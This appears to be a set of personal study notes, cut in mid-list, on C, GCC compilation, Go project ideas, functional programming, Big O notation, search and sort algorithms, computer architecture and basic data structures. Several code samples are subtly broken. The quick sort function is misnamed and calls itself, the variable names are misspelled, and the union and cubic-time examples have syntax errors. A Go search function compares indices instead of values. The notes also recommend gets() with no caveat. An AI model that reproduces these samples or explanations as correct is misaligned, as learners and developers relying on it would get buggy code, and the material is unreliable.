    • Resolves symbols (e.g., function calls, global variables) across different object files.
  • Input: One or more object files (.o) and optional libraries.
  • Output: Executable file (e.g., a.out by default).
  • Command:
    gcc file.o -o file
    
  • Example:
    • Combines multiple .o files and links to the standard C library (libc) to produce a runnable executable.

Full Process with GCC

Running GCC without intermediate steps performs all four stages automatically:

gcc file.c -o file

C Programming Notes

Overview

  • C is a general-purpose, procedural computer programming language supporting structured programming, lexical variable scope, and recursion, with a static type system.
  • Every C program has a main() function that is the entry point of the program.
  • C is a compiled language, meaning that the source code is compiled into machine code before it is executed.
  • C is a low-level language, meaning that it is closer to machine code than high-level languages like Python or JavaScript.
  • C does not support object-oriented programming
  • C is a statically typed language, meaning that the type of a variable must be declared before it is used.

Comments

  • Single line comments are denoted by //
  • Multi-line comments are denoted by /* */

Importing Libraries

  • Libraries are imported using the #include directive

Variables

  • A variable scope is the region of code where a variable can be accessed.
  • In C, all variables must be declared before they are used.
  • Variables must be declared with a type and an optional initial value.
  • To declare a variable:
int x = 5;
unsigned int y = 10;

char c = 'a';

float f = 3.14;

double d = 3.14159;

int x[5] = {1, 2, 3, 4, 5};

struct Point {
    int x;
    int y;
};

Structs

  • A struct is a user-defined data type that groups related data together.
  • To declare a struct:
struct Point {
    int x;
    int y;
};
  • To create an instance of a struct:
struct Point p;
p.x = 10;
p.y = 20;
  • To create a pointer to a struct:
struct Point *ptr = &p;
  • To access a member of a struct using a pointer:
ptr->x = 30;
ptr->y = 40;

Strings

  • C does not support strings as a primitive type. Instead, strings are represented as arrays of characters. You can import the string.h library to use string functions.
  • To declare a string:
char str[10] = "Hello\0";
  • In the example above, we declare a character array str with a size of 10. The string “Hello” is stored in the array, and the null character \0 is used to terminate the string. We use the null character because we cannot assume that the string is the same size as the array. Arrays may be larger than the string they contain.
  • C provides a string library with common functions for manipulating strings

Data Types

  • Basic data types in C include:
    • int: integer
    • char: character
    • float: floating-point number
    • double: double-precision floating-point number
    • void: no value
  • Modifiers can be used to modify the basic data types:
    • short: short integer
    • long: long integer
    • signed: signed integer
    • unsigned: unsigned integer
  • The sizeof() function can be used to determine the size of a data type in bytes.
  • The typedef keyword can be used to create custom data types.
  • C does not include boolean types by default. Instead, 0 is considered false and any other value is considered true.

Operators

  • Arithmetic operators: +, -, *, /, %
  • Relational operators: ==, !=, >, <, >=, <=
  • Logical Operators: &&, ||, !
  • Bitwise Operators: &, |, ^, ~, <<, >>

Line and Spacing Conventions

  • C is not whitespace sensitive, but it is good practice to use whitespace to make code more readable.
  • Statements in C are terminated by a semicolon ;
  • Blocks of code are enclosed in curly braces {}

Input and Output

  • The printf() function is used to print output to the console.
  • The scanf() function is used to read input from the console.
  • The getchar() function is used to read a single character from the console.
  • The putchar() function is used to print a single character to the console.
  • The gets() function is used to read a string from the console.
  • The puts() function is used to print a string to the console.

Conditionals

  • The if statement is used to execute a block of code if a condition is true.
  • The else statement is used to execute a block of code if the condition is false.
  • The else if statement is used to execute a block of code if the previous condition is false and the current condition is true.
  • Example:
int x = 10;
if (x > 5) {
    printf("x is greater than 5\n");
} else if (x == 5) {
    printf("x is equal to 5\n");
} else {
    printf("x is less than 5\n");
}

Loops

  • The for loop is used to execute a block of code a fixed number of times.
  • The while loop is used to execute a block of code as long as a condition is true.
  • The do while loop is similar to the while loop, but the condition is checked after the block of code is executed.

Examples

Hello World using a function from the math library

#include <stdio.h>
#include <math.h>

int main() {
    printf("Hello, World!\n");
    printf("The square root of 16 is %f\n", sqrt(16));
    return 0;
}
  • The main function returns a value of type int. By convention, a return value of 0 indicates that the program executed successfully.

Reading and printing an integer

#include <stdio.h>

int main() {
    int x;
    printf("Enter an integer: ");
    scanf("%d", &x);
    printf("You entered: %d\n", x);
    return 0;
}

Unions

  • A union is a user-defined data type that allows storing different data types in the same memory location.
  • The size of a union is determined by the size of its largest member.
  • A union can only store one member at a time.
  • To declare a union:
union Data {
    int i;
    float f;
    char str[20];
};

int main() {}
    union Data data;
    data.i = 10;
    printf("data.i: %d\n", data.i);
}

the bufio package

scanner

A scanner is a convenient way of reading data delimited by new lines or spaces.

Go-projects

  • csv2json

  • wc (word count)

  • cat

  • pwd

  • hashy

  • httping

  • mdp

  • httpbench

  • http status codes

  • get-headers

  • noted

  • todo

  • dnsEnum

  • todo

  • password generator

  • csvpeek

  • theHarvester clone

  • apache log parser into json

  • nginx log parser into json

  • fstab formatter

  • generic upload service

  • dead-link checker

  • my own note syncing app - Sync notes to a github repo - display notes using tea

Immutability

Functional programming is more about declaring what you want to happen, rather than how you want it to happen.

Example:

return clean_windows(add_gas(create_car()))

Python is not great for functional programming, but the example above illustrates the concept. Reasons python is not great for functional programming:

  1. Lack of immutability: Functional programming relies heavily on immutable data structures, whereas Python
  2. Limited support for tail call optimization: Functional programming often uses recursion as a primary control structure, but Python does not optimize for tail calls, which can lead to stack overflow errors for deep recursions.
  3. Mixed paradigms: Python is a multi-paradigm language that supports both imperative and object-oriented programming, which can lead to less emphasis on functional programming principles.

The key distinction in the example (relative to imperative programming), is that we never change the value of the car variable. Instead, we compose functions that return new values based on the input value.

Immutability

In functional programming, we strive to make data immutable. Once a data structure is created, it cannot be mutated. Instead, any modification needed creates a new data structure.

Immutable data is easier to think about and work with. When 10 different functions are mutating the same data structure, it can be hard to track what the current state is. With immutability, you always know that the data structure you have is exactly what it was when it was created.

Generally speaking, immutability means fewer bugs and more maintainable code.

Imperative-programming

Imperative programming is a programming paradigm where we declare what we want to happen, and how we want it to happen, step by step.

Exmaple:

car = new_car()
car.add_gas(10)
car.clean_windows()

In the example above, we create a new car object and then modify its state by adding gas and cleaning the windows through a series of commands. Each step changes the state of the car object directly.

Computer Science

Directory Map

Measuring algorithm performance

Analyzing Algorithms

  • One way to judge an algorithm’s performance is by its runtime (wall-clock time). Another method is CPU time (the time the algorithm actually run on the CPU). Neither of these are good practice, as both will vary with each run of the algorithm. Instead, computer scientists compare algorithms by looking at the number of steps they require.
  • You can input the number of steps involved in a n algorithm into a formula that can compare two or more algorithms without considering the programming language or computer.
  • Let’s take a look at a simple example:
package main

import (
    "fmt"
)

func main() {
    arr := []int{1,2,3,4,5}
    for _, v := range arr {
        fmt.Println(v)
    }
}

The function above takes 5 steps to complete. You can express this with the following formula:

f(n) = 5

If you make the program more complicated, the formula will change. Let’s say you wanted to keep track of the variables as you printed them:

package main

import (
    "fmt"
)

func main() {
    var count int = 0
    arr := []int{1,2,3,4,5}
    for _, v := range arr {
        fmt.Println(v)
        count += v
    }
}

The formula for this program would now be:

f(n) = 11

The program takes 11 steps to complete. It first assigns the count variable the value 0. Then, it prints five numbers and increments five times (1 + 5 + 5 = 11)

It can be hard to determine how many steps a particular algorithm takes, especially in large programs and in functions/methods with many conditional statements. Luckily, you don’t need to care about how many steps an algorithm has. Instead, you should care about how the algorithm performs as n gets bigger.

Because the important part of an algorithm is the part that grows the fastest as n gets bigger, computer scientists use ‘Big O’ notation to express an algorithm’s efficiency instead of a T(n) equation. Big O notation is a mathematical notation that describes how an algorithm’s time or space requirements increase as the size of n increases. Computer scientists use Big O Notation to create an order-of-magnitude function from T(n). An order-of-magnitude is a class in a classification system where each class is many times greater or smaller than the one before. In an order-of-magnitude function, you use the part of T(n) that dominates the equation, and ignore everything else. The part of T(n) that dominates the equation is an algorithm’s order of magnitude.

These are the most commonly used classifications for order of magnitude in Big O Notation, sorted from best (most efficient) to worst (least efficient):

  1. Constant Time
  2. Logarithmic time
  3. Linear time
  4. Log-Linear time
  5. Quadratic time
  6. Cubic time
  7. Exponential time

Each order of magnitude describes an algorithm’s time complexity. Time complexity is the maximum number of steps an algorithm takes to complete as n get bigger.

Order of magnitude classifications:

Constant Time

  • An algorithm runs in constant time when it requires the same number of steps regardless of the problem’s size. The Big O notation for constant time complexity is O(1). For example, let’s say you own a book store. Each day, you give the first customer of that day a free book. You may track this in a program using the following code:
free_book = customers_for_day[0]

The T(n) equation for this would be T(n) = 1

Your algorithm requires one step, no matter how many customers you have. When you graph a constant time complexity algorithm on a chart with the number of inputs on the x-axis and number of steps on the y-axis, the graph is a flat line.

Logarithmic Time

  • The second most efficient time complexity. An algorithm takes logarithmic time when its run time grows in proportion to the logarithm of the input size. You see this in algorithms such as a binary search that can discard many values at each iteration.
  • You express a logarithmic function in big O notation O(log n).
  • A logarithm is the power that a number needs to be raised to to get some other number. In computer science, the number that we raise to (the base) is always 2 (unless otherwise specified).

Linear Time

  • An algorithm that runs in linear time grows at the same rate as the size of the problem.
  • You express a linear algorithm in Big O notation O(n).
  • Suppose you modify your free book program so that instead of giving a free book to the first customer of the day, you iterate through your list of customers and give all customers who’s name starts with the letter “B” a free book. The list of customers is not sorted. Now you must iterate through the list one by one to find all the customers who’s names start with the letter “B”. When your customer list contains 5 items, your algorithm will take 5 steps. When it contains 10 items, it will take 10 steps, and so on.

Log-Linear Time

  • Log-linear time grows as a combination of logarithmic and linear time complexities. For example, a log-linear algorithm might evaluate an O(log n) operation n times. In Big O Notation, you express a log-linear algorithm as O(n log n). Log-Linear algorithms often divide a data set into smaller parts and process each piece independently.

Quadratic Time

  • An algorithm runs in quadratic time when its performance is directly proportional to the problem’s size squared. In big O notation, you express this as O(n^2)
  • Example:
numbers = [1,2,3,4,5]
for i in numbers:
    for j in numbers:
        x = i * j
        print(x)
  • As a general rule, if your algorithm contains two nested loops running from 1 to n, it’s time complexity will be at least O(n^2). Many sorting algorithms such as insertion sort use quadratic time.

Cubic Time

  • An algorithm runs in cubic time when its performance is directly proportional to the size of the problem cubed. This is expressed in Big O notation as O(n^3)
  • Example:
numbers = [1,2,3,4,5]
for i in numbers:
    for j in numbers:
        for h in numbers:
            x = i + j + 
            print(x)

Exponential Time

  • One of the worst time complexities
  • An algorithm that runs in exponential time contains a constant that is raised to the size of the problem.
  • Big O Notation: O(c^n)
  • Example:
pin = 931
n = len(pin)
for i in range(10**n):
    if i == pin:
        print(i)

Here we are trying to guess a 3 digit password. When n is 1, the algorithm takes 10 steps. When n is 2, the algorith takes 100 steps. When n is 3, the algorithm takes 1000 steps. It grows quickly.

Search Algorithms

  • Iterate through every item in a data set and compare it to the test case
  • Time complexity is O(n)
  • Consider using a Linear search when the data is not sorted
func linearSearch(numbers []int, value int) bool {
    for _, v := range numbers {
       if v == value {
            return true
       } 
    }
    return false
}

func main() {
    nums := []int{1,50,34,20,10,54,23,65}
    fmt.Println(linearSearch(nums, 34))
}
  • Faster than a linear search
  • Only works when the data is sorted
  • A binary search searches for elements in a list by dividing the list into two halves. The first step is to locate the middle number. You then determine if the number you are looking for is less than or greater than the middle number. If the number you are looking for is greater, you continue searching numbers to the right of the middle number, repeating the process of splitting this new list into two. If the number you are looking for is less, you search the numbers to the left of the middle number, repeating this process.
  • Time complexity is O(log n)

func binarySearch(needle int, haystack []int) bool {

	low := 0
	high := len(haystack) - 1

	for low <= high{
		median := (low + high) / 2

		if haystack[median] < needle {
			low = median + 1
		}else{
			high = median - 1
		}
	}

	if low == len(haystack) || haystack[low] != needle {
		return false
	}

	return true
}


func main(){
	items := []int{1,2, 9, 20, 31, 45, 63, 70, 100}
	fmt.Println(binarySearch(63, items))
}

Sorting Algorithms

Bubble Sort

Insertion sort

  • Insertion sort is a sorting algorithm where you sort a list like you sort a deck of cards. Suppose you have the numbers [ 6,5,8,2 ]. You start with the second number in the list and compare it to the first. Since 5 is less than 6, you move 5 to the first position. You now compare the number in the third position (8) to the number in the second position. Because 8 is greater than 6, 8 does not move. Because you already sorted the first half of the list, you do not need to compare 8 to 5. You then compare the 4th number in the list (2), and because 8 is greater than 2, you go one by one through the sorted left half of the list, comparing 2 to each number until it arrives at the front and the entire list is sorted: 2,5,6,8
  • Example:
def insertion_sort(a_list):
    for i in range(len(a_list) - 1):
        current_position = i + 1

        while currrent_postition > 0 and a_list[current_position - 1] > a_list[current_position]:
            # swap
            a_list[current_position], a_list[current_position - 1] = a_list[current_position - 1], a_list[current_position]
            current_position -= 1
    return a_list
  • Insertion sort is O(n^2), so it is not very efficient
  • Insert sort can be efficient on a nearly sorted list

Merge Sort

  • A merge sort is a recursive divide-and-conquer sorting algorithm that continually splits a list in half until there are one or more lists containing one item and then puts them back together in the correct order. Steps:
    1. If the list is of length 1, return the list as it is already sorted by definition of the merge sort algorithm.
    2. If the list has more than one item, split the list into two halves.
    3. Recursively call the merge sort function on both halves.
    4. Merge the two sorted halves back together into one sorted list by comparing the first

Merge Sort

  • Lists containing only one item are sorted by definition.
  • A merge sort is a ‘divide and conquer’ algorithm. You recursively break a problem into two until they are simple enough to solve easily.
  • A merge sort’s time complexity is O(n * log n)
  • With log linear time complexity, a merge sort is one of the most efficient sorting algorithms
def merge_sort(nums):
    if len(nums) < 2:
        return nums

    mid = len(nums) // 2
    first_half = nums[:mid]
    second_half = nums[mid:]

    sorted_left_side = merge_sort(first_half)
    sorted_right_side = merge_sort(second_half)
    return merge(sorted_left_side, sorted_right_side)

def merge(first, second):
    final = []
    i = 0
    j = 0

    while i < len(first) and j < len(second):
        if first[i] <= second[j]:
            final.append(first[i])
            i += 1
        else:
            final.append(second[j])
            j += 1

    while i < len(first):
        final.append(first[i])
        i += 1

    while j < len(second):
        final.append(second[j])
        j += 1
        
    return final

Quick Sort

  • Like merge sort, quick sort is a recursive divide-and-conquer sorting algorithm. However, instead of splitting the list in half, quick sort selects a ‘pivot’ element from the list and partitions the other elements into two sub-arrays according to whether they are less than or greater than the pivot. The sub-arrays are then sorted recursively.
  • Quick sort will sort the list in-pace, requiring small additional amounts of memory to perform the sorting.
  • If the list has zero or one element, it is already sorted.
  • Quick sort will quickly degrade into O(n^2) time complexity if the pivot elements are poorly chosen. i.e. if the smallest or largest element is always chosen as the pivot in an already sorted list. However, with good pivot selection, quicksort can achieve average time complexity of O(n log n). To ensure good pivot selection, you can use techniques such as choosing the median element or using randomization.
def partition(nums, low, high):
    if low < high:
        middle = partition(nums, low, high)

        quick_sort(nums, low, middle - 1)
        quick_sort(nums, middle + 1, high)

def paritition(nums, low, high):
    pivot = nums[high] # get the last element in the list
    i = low - 1 # pointer for the smaller element

    for j in range(low, high):
        if nums[j] <= pivot:
            i += 1
            nums[i], nums[j] = nums[j], nums[i] # swap

    nums[i + 1], nums[high] = nums[high], nums[i + 1] # swap pivot element
    return i + 1

Selection Sort

  • Selection sort is similar to bubble sort in that it repeatedly swaps items in a list. However, it’s slightly more performant as it only makes one swap per iteration of the outer loop.
def selection_sort(a_list):
    for i in range(len(a_list)):
        smallest_index = i
        for j in range(i + 1, len(a_list)):
            if a_list[j] < a_list[smallest_index]:
                smallest_index = j
        a_list[i], a_list[smallest_index] = a_list[smallest_index], a_list[i] # swap

Polynomial vs Exponential Time Complexity

  • Broadly speaking, algorithms can be classified into two categories based on their time complexity: polynomial time and exponential time.
  • Algorithm runs in Polynomial time if its runtime does not grow faster than n^k, where k is any constant (e.g. n^2, n^3, n^4, etc.) and n is the size of the input. Polynomial time algorithms can be useful if they are not too slow.
  • Exponential time algorithms are almost always too slow to be practical.
  • The name for the set of Polynomial time algorithms is “P”. Problems that can be solved by polynomial time algorithms are called “tractable” problems. Problems that cannot be solved by polynomial time algorithms are called “intractable” problems.

Non-Deterministic Polynomial Time (NP)

  • Non-deterministic polynomial time (NP) is a complexity describing a set of problems that can be verified in polynomial time but not necessarily solved in polynomial time.

Examples

package main

func main() {

}

// O(1) describes an algorithm that will always execute in the same time (or space) regardless of the size of the input data set.
func returnFalse() bool {
        return false
}

// O(N) describes an algorithm whose performance will grow linearly and in direct proportion to the size of the input data set. The example below also demonstrates how Big O favours the worst-case performance scenario; a matching string could be found during any iteration of the for loop and the function would return early, but Big O notation will always assume the upper limit where the algorithm will perform the maximum number of iterations.
func containsValue(value int, intSlice []int) bool {
        for r := range intSlice {
                if r == value {
                        return true
                }
        }
        return false
}

// O(N²) represents an algorithm whose performance is directly proportional to the square of the size of the input data set. This is common with algorithms that involve nested iterations over the data set. Deeper nested iterations will result in O(N³), O(N⁴) etc.
func containsDuplicates(vals []string) bool {
        for i := 0; i < len(vals); i++ {
                for j := 0; j < len(vals); j++ {
                        if i == j {
                                continue
                        }
                        if vals[i] == vals[j] {
                                return true
                        }
                }
        }
        return false
}

// O(2^N) denotes an algorithm whose growth doubles with each addition to the input data set. The growth curve of an O(2^N) function is exponential — starting off very shallow, then rising meteorically. An example of an O(2^N) function is the recursive calculation of Fibonacci numbers:
func Fibonacci(number int) int {
        if number <= 1 {
                return number
        }

        return Fibonacci(number-2) + Fibonacci(number-1)
}

Computer Architecture

Table of Contents

  1. RISC vs CISC
  2. von Neumann Architecture Model
  3. Memory and Addressing
  4. The von Neumann Bottleneck
  5. Modern Innovations in Computer Architecture

RISC vs CISC

  • The CPU executes instructions that are stored in various memory layers throughout the computer system (RAM, caches, registers).
  • A particular CPU has an Instruction Set Architecture (ISA), which defines:
    • The set of instructions the CPU uses and their binary encoding.
    • The set of CPU registers.
    • The effects of executing instructions on the state of the processor.
    • Examples of ISAs include SPARC, ARM, x86, MIPS, and PowerPC.
    • A micro-architecture is a specific implementation of an ISA which can have different circuitry. AMD and Intel both produce x86 processors, but with different micro-architectures.

Key Differences Between RISC and CISC

  • RISC (Reduced Instruction Set Computer):

    • Small set of basic instructions that execute quickly, typically in a single clock cycle.
    • Simpler micro-architecture design, requiring fewer transistors.
    • Programs may contain more instructions, but execution is highly efficient.
    • Example: ARM processors, widely used in mobile devices.
  • CISC (Complex Instruction Set Computer):

    • Designed to execute more complex instructions, which often take multiple cycles.
    • Programs are smaller as they contain fewer instructions.
    • Example: x86 processors, dominant in desktops and servers.
  • General Observations:

    • RISC architectures excel in scenarios requiring high efficiency and low power, such as mobile devices.
    • CISC architectures dominate general-purpose computing due to compatibility with legacy software and complex operations.

von Neumann Architecture Model

  • All modern processors adhere to the von Neumann architecture model.
  • The von Neumann architecture consists of five components:
    1. Processing Unit:

      • Composed of the Arithmetic/Logic Unit (ALU) and Registers.
      • The ALU performs mathematical operations (addition, subtraction, etc.).
      • Registers are fast storage units for program data and instructions being executed.
    2. Control Unit:

      • Responsible for loading instructions from memory and coordinating execution with the processing unit.
      • Contains the Program Counter (PC) and Instruction Register (IR).
    3. Memory Unit:

      • Stores program data and instructions in Random Access Memory (RAM).
      • RAM provides fast, direct access to memory locations via unique addresses.
    4. Input Unit:

      • Loads program data and instructions into the computer.
    5. Output Unit:

      • Stores or displays program results.

Fetch-Decode-Execute-Store (FEDS) Cycle

  1. Fetch: The control unit fetches the next instruction from memory using the program counter. The control unit places that address on the address bus and increments the PC. It also places the read command on the control bus. The memory unit then reads the bytes stored at the address and places them on the data bus which is then read by the control unit. The instruction register stores the bytes of the instruction received from the memory unit.
  2. Decode: The control unit decodes the instuction stored in the instruction register. It decodes the opcode and operands, determining what action to take.
  3. Execute: The processing unit executes the instruction. The ALU performs the necessary calculations or data manipulations.
  4. Store: Results are stored in memory or registers.
  • Example: In modern systems, 32-bit processors can address up to (2^{32}) bytes of memory (4 GB).

Memory and Addressing

  • Smallest Addressable Unit: In modern systems, the smallest addressable memory unit is 1 byte (8 bits).
  • 32-bit vs. 64-bit Architectures:
    • 32-bit systems: Address up to (2^{32}) bytes (4 GB).
    • 64-bit systems: Address up to (2^{64}) bytes (16 exabytes).
  • Memory Hierarchy:
    • Registers > Cache > RAM > Secondary Storage.
    • Each layer balances speed and capacity, with registers being the fastest but smallest.

The von Neumann Bottleneck

  • Definition: The limitation caused by the shared bus between memory and the CPU, which slows data transfer.
  • Consequences:
    • Slower execution of memory-intensive programs.
    • Limits on parallel execution.
  • Mitigation:
    • Use of caches to reduce frequent memory access.
    • Development of pipelining and out-of-order execution to improve instruction throughput.

Modern Innovations in Computer Architecture

  • Harvard Architecture:
    • Separates data and instruction memory, reducing the von Neumann bottleneck.
  • Multicore Processors:
    • Incorporate multiple CPUs (cores) on a single chip for parallel execution.
  • Pipelining:
    • Breaks instruction execution into stages, allowing multiple instructions to be processed simultaneously.
    • Each instruction takes 4 cycles: fetch, decode, execute, store, resulting in a CPI (cycles per instruction) of 4
    • The control circuitry of a CPU can be tweaked to obtain a better CPI value
    • The CPU circuity involved with executing each stage of the 4 stages is only actively involved once every 4 cycles. The other 3 cycles it sits idle. For example, in a given instruction, after the fetch stage, the fetch circuity sits idle for the remaining 3 clock cycles in the execution of the instruction. Pipelining is the act of allowing the fetch circuitry to execute the fetch stage for other instructions. Put another way, CPU pipelining is the idea of starting the execution of the next instruction before the current instruction has fully completed its execution. Sequences of instructions can overlap.
    • The Intel Core i7 has a 14 stage pipeline
    • A pipeline stall occurs when any stage of execution is forced to wait on another before it can continue
  • Speculative Execution:
    • Predicts and executes instructions before they are needed, increasing efficiency.
  • Graphics Processing Units (GPUs):
    • Specialized processors optimized for parallel computation, commonly used in machine learning and graphics.
  • RISC-V:
    • A modern open-standard RISC architecture gaining popularity for its flexibility and extensibility.

Building a Processor

  • The CPU implements the processing and control units of the von Neumann architecture.
  • Key components include the ALU, registers, and control unit.

ALU

  • Performs all arithmetic and logical operations on signed and unsigned integers. A separate floating point unit performs arithmetic on floating-point numbers.
  • The ALU takes integer operands and opcode values that specify an operation to perform on the operands

Registers

  • Fast, small storage units within the CPU that hold data and instructions being executed.
  • Common registers include the Program Counter (PC), Instruction Register (IR), and General-Purpose Registers (GPRs).
  • The CPU’s set of general-purpose registers is organized into a register file circuit.
    • A register file consists of a set of register circuits for storing data values and some control circuits for controlling reads and writes to its registers

Data Structures

I’m a huge proponent of designing your code around the data, rather than the other way around, and I think it’s one of the reasons git has been fairly successful… I will, in fact, claim that the difference between a bad programmer and a good one is whether he considers his code or his data structures more important. Bad programmers worry about the code. Good programmers worry about data structures and their relationships. - Linus Torvalds

  • A data structure is a way of organizing data in a computer so programmers can effectively use it in their programs.
  • An abstract data type is a description of a data structure, whereas a data structure is an actual implementation.
  • Computer scientists classify data structures based on different properties. For example, whether they are linear or non-linear.
    • Linear data structures arrange elements in a sequence.
    • Non-linear data structures link data non-sequentially
  • Traversing a data structure means to walk through the data structure one element at a time without backtracking. In a non-linear data structure, you often need to backtrack.
  • Computer scientists also classify data structure by whether they are static or dynamic:
    • static: fixed size
    • dynamic: can grow or shrink

Arrays

  • An array is a data structure that stores elements with indexes in a contiguous block of memory
  • Arrays are indexed by a key, with a key taking the form of an offset from the starting location in memory. The first element of an array is 0 elements away from the start, the next is 1 element from the start, and so on. “One element away” could be a byte, a word, etc., depending on the size of the data.
  • Retrieving or storing any element takes constant time (o(1)), and the entire array takes O(n) space. Inserting and deleting elements in an array is also O(n), which is slow, as every element may need to be moved.
  • When the number of elements is known when first creating the array, there is no wasted space.
  • Iterating through an array is likely to be much faster than any other data structure because of fewer cache misses.
  • Arrays are often homogeneous (homo = one kind, geneous/genous = producing) and static. A homogeneous data structure can only hold data of one type.

Stacks

  • A stack is an abstract data type and a linear data structure that allows you to remove only the most recently added element.
  • You can imagine a stack as a pile of books. You can add or remove only the top book.
  • Last in, first out (LIFO) data structure
  • You can push items onto the stack and pop items off of the stack
  • Stacks can be bounded (limited in size) or unbounded
  • You can create a stack with a class that internally uses an array or linked list to keep track of items
  • Pushing and popping items from a stack are all O(1)
  • Programs typically use stacks internally to track function calls

Examples

class Stack:
    def __init__(self):
        self.items = []

    def push(self, item):
        self.items.append(item)

    def size(self):
        return len(self.items)

    def peek(self):
        if len(self.items) == 0:
            return None
        return self.items[-1]

    def pop(self):
        if len(self.items) == 0:
            return None
        item = self.items[-1]
        del self.items[-1]
        return item

#------------
from stack import Stack

def is_balanced(input_str):
    s = Stack()
    for i in input_str:
        if i == "(":
            s.push(i)
        elif i == ")":
            result = s.pop()
            if result == None:
                return False

    if s.size() != 0:
        return False
    return True
// a stack implementation

package main

import (
        "fmt"
)

type stack []string

func (s *stack) push(val string) {
        *s = append(*s, val)
}

func (s *stack) pop() (string, bool) {
        if s.isEmpty() {
                return "", false
        }
        index := len(*s) - 1
        element := (*s)[index]
        *s = (*s)[:index]
        return element, true
}

func (s *stack) isEmpty() bool {
        return len(*s) == 0
}

func main() {
        var s stack

        fmt.Println("empty: ", s.isEmpty())

        s.push("hello")
        s.push("world")

        fmt.Println("length: ", len(s))
        fmt.Println("empty: ", s.isEmpty())

        fmt.Println("popping")
        val, _ := s.pop()
        fmt.Println("popped:", val)
}

Heap

  • a heap is a data structure which satisfies the heap ordering property, either min-heap (the value of each node is no smaller than the value of it’s parent) or max-heap (the value of each node is no larger than the value of it’s parent). A heap is a rooted, nearly complete binary tree, where the key of the root is greater than the key of either of its children, and this is recursively true for the subtree rooted at each child.
  • a max-heap supports the operations find-max, extract-max (pop), insert (push), and increase-key (change a node’s key and then move the node to it’s new position in the graph)
  • heaps, like stacks, tend to be implemented with arrays
  • only one element can be removed at a time (also similar to stacks), but rather than the most recent element, it will be the maximum element (for max-heap) or the minimum element (for min-heap)
  • heaps are partially ordered based on the key of each element, such that the highest (or lowest) priority element is always stored at the root

Queues

  • A queue is an abstract data type and a linear data structure which you can add items only to the rear and remove them from the front.
  • First in, first out (FIFO) data structure
  • Enqueueing means adding an item to the queue, dequeueing means removing an item from the queue
  • Queues work like the checkout lines at a grocery store.
  • A bounded queue limits how many items you can add to it.
  • Enqueueing and dequeueing, peeking, and getting the length of the queue are all O(1) regardless of the queues size

Linked Lists

  • Similar to arrays, but elements in a linked list do not have indexes because your computer does not store the items in a linked list in sequential memory. Instead, a linked list contains a chain of nodes, with each node holding a piece of data and the next node’s location in the chain. The data in each node that stores the next node’s location in the linked list is called a pointer. The first node in a linked list is called a head. The last element in a linked list points to None. head > a > b > c > none
  • The only way to access an item in a linked list is to do a linear search for it, which is O(n). Adding and removing a node from a linked list is O(1), whereas inserting and deleting items from an array is O(n).
  • Memory management systems in operating systems use linked lists extensively, as do databases
  • There are many types of linked lists:
    • singly linked list: a type of linked list with pointers that point only to the next element. You can move through a singly linked list only by starting at the head and moving to the end.
    • doubly linked list: each node contains two pointers, one pointing to the next node and one pointing to the previous node. This allows you to move through a doubly linked list in either direction.
    • circular linked list: the last node points back to the first node
  • Unlike normal lists, linked lists are not stored sequentially in memory, so they can grow and shrink dynamically without needing to reallocate or reorganize memory.

Example:

class Node(self):
    def __init__(self, val):
        self.val = val
        self.next = None
        
    def set_next(self, next_node):
        self.next = next_node

    def __repr__(self):
        return self.val

Hash Tables

  • Hash tables are associative arrays that map keys to values
  • Dictionaries are one implementation of hash tables commonly found in programming languages
  • Hash tables use a hash function to convert a key into an index in an array where the corresponding value is stored
  • The hash function should:
    • Take a key and return an integer
    • Always return the same integer for the same key
    • Always return a valid index in the array
  • A hash collision can occur when two keys hash to the same index.
  • To determine the index where a value is stored in a hash table, a hash function is used. One common hash function is to modulo the number you are storing in the hash table by the number of values the hash table can store. For example, you have a hash table that can store 7 values. You want to store the number 90. 90%7=6, so you would store the number 90 at index 6. This method can result in collisions if you have two values whose modulo results in the same index number.
  • a collision occurs when you have multiple values that map to the same spot.
  • The lookup, insertion, and deletion operations of a hash table are all o(1) on average.

Trees

  • Trees are a hierarchical data structure made up of nodes connected by edges. A tree starts with a root node at the top. Each node can have child nodes connected underneath it. Nodes with child nodes are called parent nodes. Nodes that share the same parent are called sibling nodes. The connection between two nodes is called an edge. Nodes without child nodes are called leaf nodes, while nodes with child nodes are called branch nodes.
  • Trees are like linked lists in the sense that a root node holds references to its child nodes. However, tree nodes can have multiple children instead of just one.
  • A tree structure must abide by the following rules:
    • A tree node can have a value and a list of references to child nodes.
    • Children can only have a single parent

Binary Search Trees (BST)

Binary Search Tree Binary Search Tree in O(n)

  • Trees are not particularly useful unless they are ordered in some way. One of the most common types of trees is a binary search tree.
  • In addition to the constraints of a tree structure, a BST adds the following constraints:
    • Instead of an unbounded list of children, a parent node can only have two children
    • The left child’s value must be less than its parent’s value
    • The right child’s value must be more than its parent’s value.
    • No two nodes in the tree can have identical values
  • Because of the constraints listed above, binary trees are ordered ‘by default’, making them very performant.

Example:

import random

class User:
    def __init__(self, id):
        self.id = id
        user_names = [
            "Blake",
            "Ricky",
            "Shelley",
            "Dave",
            "George",
            "John",
            "James",
            "Mitch",
            "Williamson",
            "Burry",
            "Vennett",
            "Shipley",
            "Geller",
            "Rickert",
            "Carrell",
            "Baum",
            "Brownfield",
            "Lippmann",
            "Moses",
        ]
        self.user_name = f"{user_names[id % len(user_names)]}#{id}"

    def __eq__(self, other):
        return isinstance(other, User) and self.id == other.id

    def __lt__(self, other):
        return isinstance(other, User) and self.id < other.id

    def __gt__(self, other):
        return isinstance(other, User) and self.id > other.id

    def __repr__(self):
        return "".join(self.user_name)


def get_users(num):
    random.seed(1)
    users = []
    ids = []
    for i in range(num * 3):
        ids.append(i)
    random.shuffle(ids)
    ids = ids[:num]
    for id in ids:
        user = User(id)
        users.append(user)
    return users

# The Binary Search Tree Node class
class BSTNode:
    def __init__(self, val=None):
        self.left = None
        self.right = None
        self.val = val

    def insert(self, val):
        if not self.val:
            self.val = val
            return

        if self.val == val:
            return

        if val < self.val:
            if not self.left:
                self.left = BSTNode(val=val)
            else:
                self.left.insert(val)
        else:
            if not self.right:
                self.right = BSTNode(val=val)
            else:
                self.right.insert(val)
  • Inserting into a BST is O(log n) on average, but O(n) in the worst case (when each node has a single child, essentially creating a linked list.)
  • While it’s true that on average a BST has a time complexity of O(log n) for lookups, deletions, and insertions. This rule can quickly break down if the data is mostly or completely sorted. If mostly or completely sorted data is inserted into a binary tree, the tree will become deeper than it is wide. The BST’s time complexity depends on it being balanced, meaning that the left and right subtrees of any node differ in height by no more than one. If the tree becomes unbalanced, the time complexity for lookups, deletions, and insertions can degrade to O(n) in the worst case.

Red Black Trees

